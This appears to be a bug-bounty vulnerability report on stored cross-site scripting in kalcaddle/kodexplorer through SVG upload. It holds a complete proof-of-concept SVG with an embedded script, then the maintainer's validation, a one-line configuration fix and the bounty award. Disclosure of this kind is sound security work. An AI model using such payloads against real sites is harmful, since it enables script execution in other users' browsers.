Cross-site Scripting (XSS) - Stored in kalcaddle/kodexplorer

Valid

Reported on

Aug 3rd 2021


✍️ Description

XSS via SVG file Upload

🕵️‍♂️ Proof of Concept

upload the svg file with xss payload and open it with browser

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graph
ics/SVG/1.1/DTD/svg11.dtd">


<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg
">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width
:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>


💥 Impact

Custom JS code execution embedded with in the svg file

Occurences

We have contacted a member of the kalcaddle/kodexplorer team and are waiting to hear back 4 months ago
Ajmal Aboobacker modified their report
4 months ago
warlee
4 months ago

Maintainer


config set disable file ext

warlee validated this vulnerability 4 months ago
Ajmal Aboobacker has been awarded the disclosure bounty
The fix bounty is now up for grabs